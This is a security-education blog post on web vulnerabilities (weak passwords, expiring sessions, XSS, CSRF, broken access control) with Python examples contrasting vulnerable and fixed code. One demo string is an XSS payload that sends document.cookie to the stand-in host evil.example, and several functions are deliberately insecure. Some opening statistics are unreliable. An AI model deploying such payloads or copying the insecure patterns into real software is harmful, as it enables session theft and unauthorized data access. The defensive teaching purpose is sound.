coder7475
Posted on August 19, 2024
Introduction
The average cost of a data breach in 2020 was $2.86 million, and global cybercrime cost $6 trillion.
In 2020, 90% of web apps were vulnerable to hacking and 68% were vulnerable to a breach of sensitive data.
As of 2023, the average cost of a data breach in the United States amounted to 9.48 million U.S. dollars, up from 9.44 million U.S. dollars in the previous year.
The global average cost per data breach was 4.45 million U.S. dollars in 2023.
Terminologies
Vulnerability: A security vulnerability is a code flaw or a system misconfiguration that an attacker can use to gain unauthorized access to a system or network.
Exploit: The method used to take advantage of a vulnerability, usually custom software or a sequence of commands. Exploit kits can be embedded in web pages to scan visitors for vulnerabilities and inject malware or viruses when a weakness is found.
Threat: An actual or hypothetical event in which one or more exploits use a vulnerability to mount an attack.
Types of vulnerabilities
- Common vulnerabilities and weaknesses. Find on:
Three categories of security weakness
- Porous defenses: A porous defenses weakness is one that could allow users to bypass or spoof the authentication and authorization process. Authentication verifies the identity of something trying to access a system, while authorization is the set of access and usage permissions it is granted. Attacks in this category include credential stuffing, hijacking of session IDs, stealing login credentials and man-in-the-middle attacks. Examples of vulnerabilities:
  - weak password encoding
  - insufficiently protected credentials
  - missing or single-factor authentication
  - insecurely inherited permissions
  - sessions that don't expire.
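Two of the weaknesses listed above, weak password encoding and sessions that don't expire, side by side with their hardened forms. This is an added example, not code from the original post; it uses only the Python standard library, and every name in it (weak_store, hash_password, SessionStore, the iteration count) is this example's own choice, not a reference to any particular framework.

```python
"""Porous defenses, illustrated: reversible password "encoding" beside a salted,
slow password hash, and a session store whose IDs are unguessable and expire."""
import base64
import hashlib
import hmac
import os
import time
from typing import Callable, Dict, Optional, Tuple

# --- Weak password encoding: base64 is not hashing. It is reversible, so a
# --- leaked credential table hands an attacker every plaintext password.
def weak_store(password: str) -> str:
    return base64.b64encode(password.encode()).decode()

def weak_recover(stored: str) -> str:
    # No secret is needed to undo the "encoding"; this is the attacker's view.
    return base64.b64decode(stored).decode()

# --- Hardened: per-user random salt, deliberately slow PBKDF2-HMAC-SHA256,
# --- and a constant-time comparison on verification.
PBKDF2_ITERATIONS = 600_000  # work factor chosen for this example; tune to your hardware

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    # Store what verification needs (algorithm, work factor, salt, digest),
    # nothing that reveals the password itself.
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(stored: str, candidate: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False  # refuse unknown/legacy formats rather than guessing
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    # compare_digest does not short-circuit on the first differing byte,
    # so timing does not leak how much of the digest matched.
    return hmac.compare_digest(digest.hex(), digest_hex)

# --- Sessions that expire: random IDs with a hard TTL; expired IDs are dropped
# --- so a stolen ID stops working once the window closes.
class SessionStore:
    def __init__(self, ttl_seconds: int, clock: Callable[[], float] = time.time):
        self.ttl = ttl_seconds
        self.clock = clock  # injectable so expiry can be tested without sleeping
        self._sessions: Dict[str, Tuple[str, float]] = {}

    def create(self, username: str) -> str:
        session_id = os.urandom(32).hex()  # 256 bits of randomness, not a counter
        self._sessions[session_id] = (username, self.clock() + self.ttl)
        return session_id

    def lookup(self, session_id: str) -> Optional[str]:
        entry = self._sessions.get(session_id)
        if entry is None:
            return None
        username, expires_at = entry
        if self.clock() >= expires_at:
            self._sessions.pop(session_id, None)  # expired: remove, never renew silently
            return None
        return username

if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print("weak store reversible:", weak_recover(weak_store("hunter2")))
    print("hardened verify:", verify_password(record, "correct horse battery staple"))
    store = SessionStore(ttl_seconds=900)
    sid = store.create("alice")
    print("session valid:", store.lookup(sid) == "alice")
```

The stored hash string carries its own algorithm tag and iteration count, which is what lets you raise the work factor later and re-hash users on their next successful login instead of forcing a reset.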
- Risky resource management: weaknesses in how the application manages resources such as memory, functions and open-source frameworks. The vulnerability types include:
  - out-of-bounds read or write / buffer overflow
  - path traversal, etc.
- Insecure interaction between components: these vulnerabilities arise because modern applications send and receive data across a wide range of services, threads and processes. The vulnerabilities are:
  - Cross-site scripting (XSS): user input is not handled securely, enabling injection of client-side script into web pages viewed by other users.
  - Cross-site request forgery (CSRF): improper verification of whether a seemingly legitimate and authentic request was intentionally sent. These attacks are often mounted via social engineering vectors such as bogus emails that trick a user into clicking a link, which sends a forged request to a site where the user is already authenticated.
  - Attacks in this category are carried out via backdoors, scripting attacks, worms, trojan horses, etc.
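The two web weaknesses just described, shown as a vulnerable handler beside its fixed form: a comment renderer that does and does not escape user input (XSS), and a state-changing request that is and is not protected by a per-session CSRF token. This is an added example, not code from the original post; the handler names, the HMAC-based token scheme and the constructed server secret are this example's own assumptions.

```python
"""Insecure interaction between components: XSS and CSRF, vulnerable vs. fixed."""
import hashlib
import hmac
import html

# --- XSS: a stored comment rendered into HTML seen by every other user.
def render_comment_vulnerable(comment: str) -> str:
    # Untrusted text is dropped straight into markup, so a comment containing
    # <script> runs in every viewer's browser.
    return f'<p class="comment">{comment}</p>'

def render_comment_safe(comment: str) -> str:
    # html.escape turns < > & " ' into entities; the browser displays the
    # text instead of parsing it as HTML. Output encoding belongs at the
    # point where data meets the page, not at input time.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'

# --- CSRF: a forged request from another origin carries the victim's session
# --- cookie automatically, but it cannot know a token that was only ever
# --- embedded in the legitimate form served to that session.
SERVER_SECRET = b"constructed-example-secret-replace-in-real-code"  # constructed value

def csrf_token_for(session_id: str) -> str:
    # Token bound to the session via HMAC, so the server need not store it.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def transfer_vulnerable(request: dict, session_id: str) -> str:
    # Trusts the session cookie alone: any cross-site form post succeeds.
    return f"200 OK: transferred {request['amount']} to {request['to']}"

def transfer_protected(request: dict, session_id: str) -> str:
    supplied = request.get("csrf_token", "")
    expected = csrf_token_for(session_id)
    # Constant-time compare; a missing or foreign token is rejected before
    # any state changes.
    if not hmac.compare_digest(supplied, expected):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {request['amount']} to {request['to']}"

if __name__ == "__main__":
    hostile = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    print(render_comment_vulnerable(hostile))
    print(render_comment_safe(hostile))
    sid = "session-id-from-cookie"
    forged = {"amount": 1000, "to": "mallory"}           # no token: cross-site post
    legit = {"amount": 20, "to": "bob", "csrf_token": csrf_token_for(sid)}
    print(transfer_protected(forged, sid))
    print(transfer_protected(legit, sid))
```

The token check only helps if the legitimate form actually embeds `csrf_token_for(session_id)` and the action is never reachable via a plain GET link; the bogus-email scenario in the text works precisely when a link alone is enough to cause the state change.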
Top vulnerability
Broken Access Control
- 94% of applications have some sort of broken access control.
- Access control makes sure that users cannot act outside of their intended permissions.
- This vulnerability can lead to unauthorized information disclosure, modification, or even destruction of data.
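The disclosure and destruction risks listed above, as an added example that is not part of the original post: an endpoint that authenticates the caller but never checks who owns the record (so changing the id in the URL reads or deletes another customer's data) next to a deny-by-default version that also records refused attempts for detection. The invoice table, role names and exception classes are constructed for this example.

```python
"""Broken access control: an object reference that is authenticated but not
authorized, beside a handler that checks ownership (or an explicit role) and
logs every denial."""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List

@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner: str
    total: float

# Constructed sample data standing in for a database table.
INVOICES: Dict[int, Invoice] = {
    1: Invoice(1, "alice", 120.0),
    2: Invoice(2, "bob", 45.5),
}

class NotFound(Exception):
    pass

class Forbidden(Exception):
    pass

# Denied attempts are appended here; in a real service this feeds the SIEM,
# where a burst of 403s across sequential ids is a classic IDOR probe signature.
DENIED_LOG: List[str] = []

def get_invoice_vulnerable(current_user: str, invoice_id: int) -> Invoice:
    # The caller is logged in, but nothing ties the record to that caller:
    # any authenticated user can read any invoice by guessing its id.
    return INVOICES[invoice_id]

def delete_invoice_vulnerable(current_user: str, invoice_id: int) -> None:
    # Same flaw on a destructive operation: data loss, not just disclosure.
    INVOICES.pop(invoice_id)

def _authorize(current_user: str, invoice: Invoice, roles: FrozenSet[str], action: str) -> None:
    # Deny by default: only the owner, or a user holding the "auditor" role
    # for read access, gets through. The decision is made server-side from
    # the session, never from anything the client sends.
    is_owner = invoice.owner == current_user
    is_auditor_read = action == "read" and "auditor" in roles
    if not (is_owner or is_auditor_read):
        DENIED_LOG.append(f"user={current_user} action={action} invoice={invoice.invoice_id}")
        raise Forbidden(f"{current_user} may not {action} invoice {invoice.invoice_id}")

def get_invoice(current_user: str, invoice_id: int, roles: FrozenSet[str] = frozenset()) -> Invoice:
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise NotFound(invoice_id)
    _authorize(current_user, invoice, roles, "read")
    return invoice

def delete_invoice(current_user: str, invoice_id: int, roles: FrozenSet[str] = frozenset()) -> None:
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        raise NotFound(invoice_id)
    _authorize(current_user, invoice, roles, "delete")
    del INVOICES[invoice_id]

if __name__ == "__main__":
    print("vulnerable: bob reads alice's invoice ->", get_invoice_vulnerable("bob", 1))
    try:
        get_invoice("bob", 1)
    except Forbidden as exc:
        print("fixed:", exc)
    print("denied log:", DENIED_LOG)
```

Whether a denied request should answer 403 or 404 is a design choice: returning 404 for records the caller does not own avoids confirming that the id exists at all.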